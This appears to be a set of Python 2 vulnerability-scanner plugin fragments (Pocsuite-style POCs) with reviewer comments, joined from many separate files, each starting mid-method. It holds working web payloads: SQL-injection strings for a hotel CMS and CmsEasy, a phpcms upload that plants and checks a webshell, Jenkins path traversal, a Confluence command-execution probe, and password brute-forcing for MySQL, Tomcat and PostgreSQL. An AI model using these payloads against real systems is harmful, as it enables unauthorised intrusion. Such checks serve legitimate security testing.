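def _attack(self):
    """Attack mode: run the verify check and return its Output.

    The original built an unused ``result`` dict and called ``_verify``
    without returning its value, so callers of ``_attack`` received ``None``
    instead of the Output object.  It now returns the same Output that
    ``_verify`` produces, matching the ``_attack`` methods of the sibling POCs.
    """
    return self._verify()


def _verify(self):
    """Probe ``?m=hotel.getHotelInfo`` for an error-based SQL injection.

    Posts the fixed ``hotelId`` payload and looks for the ``~~~...~~~``
    markers the payload makes the database echo back into the response.

    Returns:
        The Output built by ``parse_output``: success carrying the URL and
        payload when the markers are found, failure otherwise.

    NOTE(review): no status-code check is made and network errors from
    ``req.post`` propagate to the caller; ``resp.content`` is matched as a
    str body (Python 2 semantics).
    """
    result = {}
    vulurl = "%s/?m=hotel.getHotelInfo" % self.url
    payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"}
    resp = req.post(vulurl,data = payload,timeout =15)
    # The injected expression wraps its output in ~~~ so it can be located
    # anywhere in the body; re.S lets the match span line breaks.
    re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
    if re_result:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vulurl
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)


def parse_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output


register(TestPOC)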
# NOTE(review): fragment -- the enclosing method (a try block inside _verify) starts before this chunk.
        s.send(binascii.unhexlify(tree_connect_andx_request))
        data = s.recv(1024)
        # Bytes 28..36 of the reply are spliced into the next request.
        all_id = data[28:36]
        payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000" \
                  "0000004a0000004a0002002300000007005c504950455c00" % all_id.encode('hex')
        s.send(binascii.unhexlify(payload))
        data = s.recv(1024)
        # NOTE(review): close() is inside the try, so a socket error on any
        # earlier line leaves the socket open.
        s.close()
        if "\x05\x02\x00\xc0" in data:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            # Only prefixes are reported so the record stays short.
            result['VerifyInfo']['Payload'] = payload[:20]
            result['VerifyInfo']['result'] = data[:20]
    # NOTE(review): every error (timeout, refused connection, short read)
    # is discarded here and reported as "not vulnerable".
    except Exception as e:
        pass
    return self.parse_attack(result)


def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


def parse_attack(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet noting return')
    return output


register(TestPOC)
# NOTE(review): fragment -- the enclosing method (a try block) starts before this chunk.
        client = paramiko.SSHClient()
        # AutoAddPolicy accepts any unknown host key without verification;
        # acceptable for a scanner, but it means the check is not
        # authenticating the remote host.
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # Key-based login only: empty password, key taken from keyfile.
        client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile)
        stdin, stdout, stderr = client.exec_command(command)
        cmd_output = stdout.read()
        # NOTE(review): close() is reached only on the success path; an
        # exception from connect()/exec_command() skips it.
        client.close()
        # Treated as vulnerable only when the command output is exactly 'root'.
        return True if cmd_output == 'root' else False
    except IOError:
        # Typically the key file could not be read.
        logger.debug( "Generate a keyfile for tool to bypass remote/local server credentials." )
        return False
    except paramiko.SSHException as e:
        logger.debug( "TCPForwarding disabled on remote server can't connect. Not Vulnerable" )
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False


register(DemoPOC)
# NOTE(review): fragment -- the enclosing method (an if/else inside a try) starts before this chunk.
                print '%s is vulnerable!' % testurl
                # NOTE(review): returns a bool, not an Output object; the
                # save_output() call below is reached only via the except path.
                return True
            else:
                print '没有发现关键字:successfully. '
                return False
        except Exception as e:
            # Connection failure is printed and swallowed.
            print '连接失败'
            pass
        return self.save_output(result)

    # Attack module
    def _attack(self):
        # NOTE(review): no attack implemented; returns None rather than an Output.
        pass

    # Output report
    def save_output(self, result):
        # Emit success when a result exists, failure otherwise.
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# Register the class
register(TomcatuploadPOC)
# NOTE(review): fragment -- the enclosing method (a try inside a port loop) starts before this chunk.
        except:
            # NOTE(review): bare except swallows every error, including
            # KeyboardInterrupt, and silently treats the port as not open.
            #print e
            pass
    # Any port collected in vul_port is reported.
    if vul_port.__len__() > 0:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['url'] = self.url
        result['VerifyInfo']['Payload'] = "port:" + str(vul_port)
    print '[+]28 poc done'
    return self.save_output(result)
    #pass


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()
    #pass


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(HadoopPOC)
# NOTE(review): fragment -- the enclosing _verify method (and the string this line closes) starts before this chunk.
    临时判断 , 有正确和误报时,对比提取特征解决误报 """
    # (Chinese note above, kept verbatim: provisional check; refine the
    # fingerprint if false positives show up.)
    #print r,type(r)
    # NOTE(review): [0] raises IndexError when the body has no <title>;
    # nothing here catches it.
    title = re.findall(r"<title>(.*)</title>", r.content)[0]
    if 'Solr Admin' in title and 'Dashboard' in r.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Payload'] = Payload
    else:
        result = {}
    print '[+]7 poc done'
    return self.save_output(result)


# Exploit
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register(SolrPOC)
# NOTE(review): fragment -- the enclosing method starts before this chunk.
    # Out-of-band check: the command resolves a BANNER-prefixed name under
    # DOMAIN, and the DNS log is consulted afterwards.
    cmd = "ping {0}.{1}".format(self.BANNER, self.DOMAIN)
    self._verify(template, cmd)
    if self.dnslog_sucess(self.CEYE_URL):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = target_url
    return self.save_output(result)


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Confirm the DNS name was resolved, i.e. the command executed
def dnslog_sucess(self, url):
    """Return True when the first logged record contains ``self.BANNER``.

    NOTE(review): the request and .json() call sit outside the try, so
    network/decode errors propagate; when a record exists but does not
    contain BANNER the method falls through and returns None.  Only the
    first entry of ``data`` is inspected.
    """
    _resp = req.get(url)
    d = _resp.json()
    try:
        name = d['data'][0]['name']
        if self.BANNER in name:
            return True
    except Exception:
        # Missing keys / empty list are treated as "not resolved".
        return False


# Register the class
register(ConfluenceRcePOC)
# NOTE(review): fragment -- the enclosing method (a loop over candidate paths `i`) starts before this chunk.
        try:
            # NOTE(review): verify=False disables TLS certificate
            # verification for this request (assuming req wraps requests).
            resp = req.get(url=vul_url, timeout=3, verify=False)
            # Heuristic: a JSON content type plus a body over 500 bytes.
            # A missing Content-Type header raises KeyError, swallowed below.
            if resp.headers[ 'Content-Type'] and 'application/json' in resp.headers[ 'Content-Type'] and len(resp.content) > 500:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = vul_url
                result['VerifyInfo']['Payload'] = 'path:/{}'.format(i)
                # First hit wins.
                break
        except Exception as e:
            # Errors for this path are ignored; the loop moves on.
            pass
    print '[+]58 poc done'
    return self.save_output(result)


# Attack module
def _attack(self):
    # NOTE(review): no attack implemented; returns None rather than an Output.
    pass


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(ActuaorPOC)
# NOTE(review): fragment -- the enclosing _verify method (an if inside a try) starts before this chunk.
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            # The URL itself is recorded as the payload.
            result['VerifyInfo']['Payload'] = vul_url
        else:
            print '[+] No Vulnerable found'
    except Exception as e:
        # Error is printed, then swallowed.
        print e
        pass
    print '[+]44 poc done'
    return self.save_output(result)


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(DNSPOC)
# NOTE(review): fragment -- the enclosing _verify method (nested if/else inside a try) starts before this chunk.
            else:
                # Header present but reports a cache miss.
                print '[-]The X-Proxy-Cache is MISS.'
                print '[-]Can not find the vuln.'
        else:
            # Header absent entirely.
            print '[-]The header without X-Proxy-Cache.'
            print '[-]Can not find the vuln.'
    except Exception as e:
        # return host
        # Error is printed and otherwise ignored.
        print e
    return self.save_output(result)


# Exploit
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register(NginxPOC)
# NOTE(review): fragment -- the enclosing method starts before this chunk.
    return self.save_output(result)
    # NOTE(review): two identical returns appear back to back; if they share
    # a block the second is unreachable -- confirm against the full file.
    return self.save_output(result)


# Confirm the DNS name was resolved, i.e. the command executed
def dnslog_sucess(self, url):
    """Return True when the first logged record contains ``self.BANNER``.

    NOTE(review): the request and .json() call sit outside the try, so
    network/decode errors propagate; when a record exists but does not
    contain BANNER the method falls through and returns None.
    """
    resp = req.get(url)
    d = resp.json()
    try:
        name = d['data'][0]['name']
        if self.BANNER in name:
            return True
    except Exception:
        # Missing keys / empty list are treated as "not resolved".
        return False


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(NexusManagerPOC)
# NOTE(review): fragment -- the enclosing method (an if/else inside a try) starts before this chunk.
            # NOTE(review): both branches return a bool and skip sock.close();
            # the Output path below is reached only after an exception.
            return True
        else:
            print '没有发现 :root: 特征字'
            return False
    except Exception as e:
        print 'socket连接失败'
        pass
    sock.close()
    return self.save_output(result)


# Attack module
def _attack(self):
    # NOTE(review): no attack implemented; returns None rather than an Output.
    pass


# Output report
def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(fastcgiPOC)
# NOTE(review): fragment -- the enclosing output method (an if/else) starts before this chunk.
        output.fail('Internet nothing returned')
    return output


def query(self, ns):
    """Attempt a zone transfer from nameserver ``ns``.

    Resolves ``ns`` to an address first, then pulls the zone.  Returns the
    zone text, or None (after printing to stderr) when the transfer fails
    or returns nothing.
    """
    nsaddr = self.resolve_a(ns)
    try:
        z = self.pull_zone(nsaddr)
    except (exception.FormError, socket.error, EOFError):
        print >> sys.stderr, "AXFR failed\n"
        return None
    else:
        return z


def resolve_a(self, name):
    """Pulls down an A record for a name (only the first answer is used)."""
    nsres = resolver.query(name, 'A')
    return str(nsres[0])


def pull_zone(self, nameserver):
    """Sends the domain transfer request.

    Concatenates every AXFR message for ``self.domain`` into one string.
    Raises EOFError when the server returned no data so callers can treat
    an empty transfer as a failure.  ``query`` here is the module-level
    name the file imports, not this class's ``query`` method.
    """
    q = query.xfr(nameserver, self.domain, relativize=False, timeout=2)
    zone = ""
    for m in q:
        zone += str(m)
    if not zone:
        raise EOFError
    return zone


register(DNS_transforPoc)
references = ['https://www.openssl.org/~bodo/ssl-poodle.pdf']
name = 'SSL 3.0 POODLE攻击信息泄露漏洞 POC'
appPowerLink = 'https://tools.ietf.org/html/rfc6101'
appName = 'SSL'
appVersion = '3.0'
vulType = 'Information Disclosure'
desc = ''' SSL 3.0使用的CBC块加密的实现存在漏洞,攻击者可以成功破解SSL连接的加密信息,比如获取用户cookie数据 '''
samples = ['www.baidu.com', 'taobao.com']


def _verify(self):
    """Report success when the target still accepts an SSLv3 handshake.

    The port comes from the URL, defaulting to 443; the host is resolved
    through url2ip and handed to check_poodle.  No details are attached to
    a successful result.
    """
    output = Output(self)
    parsed = urlparse.urlparse(self.url)
    sslv3_accepted = check_poodle(url2ip(self.url), parsed.port or 443)
    if not sslv3_accepted:
        output.fail('Not support SSLv3 connection. Not Vulnerable')
        return output
    output.success({})
    return output


def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


register(SSLv3_POODLE)
# NOTE(review): fragment -- the enclosing method (credential loops around a try) starts before this chunk.
                                 u, pwd, 'mysql', connect_timeout=_conn_timeout)
                # A successful connect is the whole test; the first working
                # pair is reported and the method returns immediately.
                conn.close()
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = u + ":" + pwd
                return self.save_output(result)
            except Exception as e:
                # Any failure (auth error, timeout) means "try the next pair".
                pass
    return self.save_output(result)


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()
    #pass


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(MYSQLPOC)
# NOTE(review): fragment -- the enclosing method (an if/else) starts before this chunk.
        print(message)
        result['VerifyInfo'] = {}
        result['VerifyInfo']['url'] = ip
        result['VerifyInfo']['Payload'] = pay
        # NOTE(review): returns a bool, not an Output object.
        return True
    else:
        print '没有发现关键字.'
        return False
    # NOTE(review): unreachable -- both visible branches return above.
    return self.save_output(result)


# Attack module
def _attack(self):
    # NOTE(review): no attack implemented; returns None rather than an Output.
    pass


# Output report
def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(iis_RCE_POC)
# NOTE(review): fragment -- the enclosing _verify method starts before this chunk.
    # print check
    # The random `salt` sent in the Host header is searched for in every
    # entry of `check`; one reflection is enough to report the finding.
    if response:
        for x in check:
            if salt in check[x]:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = 'Host: ' + salt
                break
    else:
        result = {}
    print '[+]25 poc done'
    return self.save_output(result)


# Exploit
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register(HTTPPOC)
# NOTE(review): fragment -- the enclosing TestingCms method (a loop inside a try) starts before this chunk.
                break
            else:
                break
    except:
        # NOTE(review): bare except turns every error into "not found" (0).
        return 0
    return 0


def _attack(self):
    '''attack mode -- identical to verify mode for this POC'''
    return self._verify()


def _verify(self):
    '''verify mode: report the URL when TestingCms() returns 1'''
    result = {}
    # self.url = self.url
    checkcode = self.TestingCms(self.url)
    if checkcode == 1:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
    return self.parse_output(result)


def parse_output(self, result):
    '''wrap result in an Output: success when non-empty, else failure'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output


register(DedeShortNamePOC)
# NOTE(review): fragment -- the enclosing _verify method (a try block) starts before this chunk.
        # NOTE(review): a successful TCP connect alone is recorded as a
        # finding; no rsync protocol exchange is visible here, so an open
        # port that requires authentication would also be reported.
        s.connect((ip, port))
        print('Rsync未授权访问')
        message = 'Rsync 873端口 未授权访问'
        result['VerifyInfo'] = {}
        result['VerifyInfo']['url'] = ip
        result['VerifyInfo']['Payload'] = message
    except Exception as e:
        print(e)
    s.close()
    print '[+]30 poc done'
    return self.save_output(result)


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


# Register the class
register(rsyncPOC)
# NOTE(review): fragment -- the enclosing method (credential loops around a try) starts before this chunk.
            print '当前 ' + u + ":" + p
            reponse = req.get(vul_url, timeout=5, headers=header)
            if ("Tomcat Web Application Manager" in reponse.text):
                # NOTE(review): no break after a hit, so a later matching
                # pair overwrites this record; the last match is reported.
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = u + ":" + p
        except Exception as e:
            print e
            pass
    print '[+]34 poc done'
    return self.save_output(result)


# Attack module
def _attack(self):
    # NOTE(review): no attack implemented; returns None rather than an Output.
    pass


# Output report
def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(TomcatPOC)
def test_register_poc(self):
    """Registering a POC class must record its module basename in ``kb``."""
    register(test_class)
    registered = kb.registered_pocs
    assert registered is not None
    module_basename = test_class.__module__.rsplit('.', 1)[-1]
    assert module_basename in registered
# NOTE(review): fragment -- the enclosing _verify method (and the payload dict) starts before this chunk.
        'xajax': 'LiveMessage',
        # Adjacent literals are concatenated by the parser into one value.
        'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                              "floor(rand(0)*2),(select md5(233)))a from "
                              "information_schema.tables group by a)b),"
                              "'','','','1','127.0.0.1','2') #"
    }
    response = req.post(vul_url, data=payload, timeout=30).content
    # The fixed hash is the marker the injected md5() call echoes back.
    if 'e165421110ba03099a1c0393373c5b43' in response:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
    return self.parse_attack(result)


def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


def parse_attack(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail("Internet nothing returned")
    return output


register(CmsEasyPoc)
# NOTE(review): fragment -- the enclosing _verify method starts before this chunk.
    """ 临时判断 , 有正确和误报时,对比提取特征解决误报 """
    # (Chinese note above, kept verbatim: provisional check; refine the
    # fingerprint if false positives show up.)
    #print r,type(r)
    # Title-only fingerprint; the URL doubles as the reported payload.
    if "Druid Console" in title:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Payload'] = vul_url
    else:
        pass
    print '[+]8 poc done'
    return self.save_output(result)


# Exploit
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register(DruidPOC)
# NOTE(review): fragment -- the enclosing _verify method (a try block) starts before this chunk.
        sk.connect((_host, _port))
    except Exception:
        # NOTE(review): returns before sk.close(), leaving the socket open
        # on the failure path.
        return self.save_output(result)
    sk.close()
    # checkUsername() is defined elsewhere in the file; "1" is its
    # "user enumeration observed" answer.
    resulta = checkUsername("rootasdf23", _host)
    if (resulta == "1"):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = _host
        # Python 2 str.decode; this line would fail on Python 3.
        result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8")
    return self.save_output(result)


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(SS1HPOC)
# NOTE(review): fragment -- the enclosing method (a path loop around a try) starts before this chunk.
            text = req.get(url,timeout=4).text
            # Either fingerprint is accepted; the first matching path `p`
            # is reported and the method returns immediately.
            if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            print e
            pass
    return self.save_output(result)


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()
    #pass


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(webLogicPOC)
# NOTE(review): fragment -- the enclosing _verify method (an if inside a try) starts before this chunk.
            result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'
            return self.save_output(result)
    except:
        # NOTE(review): bare except; the error is printed and discarded.
        print '连接失败'
        pass
    sock.close()
    # print '-' * 18 + '\n'
    print data
    # print '-' * 18 + '\n'
    # NOTE(review): no return here, so the no-match and error paths yield
    # None instead of an Output object.


# Attack module
def _attack(self):
    # NOTE(review): no attack implemented; returns None rather than an Output.
    pass


# Output report
def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(MSPOC)
# NOTE(review): fragment -- the enclosing _verify method starts before this chunk.
    # Emit if any results
    if len(payload_dict) != 0 :
        # Keep only URLs whose response value is unique across the probes
        # (a shared value usually means a catch-all page).
        # NOTE(review): values().count() inside the loop is O(n^2) and
        # values() is a list only on Python 2.
        for i in payload_dict:
            if payload_dict.values().count(payload_dict[i]) == 1:
                final_url.append(i)
        print final_url
        # More than 14 unique hits is treated as noise, not a finding.
        if ((len(final_url)) != 0 and (len(final_url)) <15):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = str(final_url)
    print '[+]11 poc done'
    return self.save_output(result)


# Exploit
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register(FilefindPOC)
# NOTE(review): fragment -- the enclosing _verify method (a try block) starts before this chunk.
        # ssltest() is defined elsewhere in the file; "check" is its
        # "vulnerable" answer.
        ret = ssltest(_host, _port)
        # print ret
        if ret == "check":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = host
            result['VerifyInfo']['Payload'] = payload
        else:
            pass
    except:
        # NOTE(review): bare except; connection errors are silently treated
        # as "not vulnerable".
        pass
    print '[+]20 poc done'
    return self.save_output(result)


# Exploit
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    result = {}
    # attack code
    return self._verify()


def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


register(OpensslPOC)
# NOTE(review): fragment -- the enclosing _verify method (and the `data` dict) starts before this chunk.
        "dosubmit": "1",
        "protocol": "",
    }
    match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
    resp = req.post(url, data=data)
    shell = re.findall(match, resp.text)
    # NOTE(review): shell[0] is evaluated before the `if shell` guard, so an
    # empty match list raises IndexError here.
    shellinfo = ''.join(shell[0]) + ".php"
    if shell:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        # The uploaded file is only recorded if it is reachable (HTTP 200).
        shell_resp = req.get(shellinfo)
        if shell_resp.status_code == 200:
            result['VerifyInfo']['webshell'] = shellinfo
    return self.parse_attack(result)


# NOTE(review): this alias is replaced by the `def _attack` below, so it has
# no effect on the final class.
_attack = _verify


def parse_attack(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output


def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


register(phpcms_getshll)
# NOTE(review): fragment -- the enclosing _verify method starts before this chunk.
    # BACKDIR_COUNT levels of ../ are prepended to file_name in the header.
    header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
    try:
        vulurl = vul_ip + '/plugin/credentials/.ini'
        vulurltest = req.get(vulurl, headers=header)
        if "MPEGVideo" in vulurltest.text:
            # NOTE(review): str.find() returns -1 (truthy) when 'version' is
            # absent and 0 (falsy) only when it is at offset 0, so this test
            # is effectively inverted; `!= -1` or `in` was probably intended.
            if vulurltest.text.find('version'):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = vulurl
                result['VerifyInfo']['Payload'] = header
    except Exception as e:
        # Errors are swallowed and reported as "not vulnerable".
        pass
    return self.save_output(result)


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


# Output report
def save_output(self, result):
    """Wrap ``result`` in an Output: success when non-empty, else failure."""
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(JenkinsPOC)
# NOTE(review): fragment -- the enclosing _verify method (a password loop around a try) starts before this chunk.
            message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format( _host, pwd)
            print "有弱口令漏洞"
            conn.close()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url
            # The accepted password ends up in the report via `message`.
            result['VerifyInfo']['Payload'] = message
            # First accepted password ends the loop.
            break
        except Exception as e:
            # Auth failure / connection error: print and try the next one.
            print e
    print '[+]29 poc done'
    return self.save_output(result)


# Attack module
def _attack(self):
    """Attack mode is identical to verify mode for this POC."""
    return self._verify()


# Output report
def save_output(self, result):
    # Emit success when a result exists, failure otherwise.
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output


# Register the class
register(PGPOC)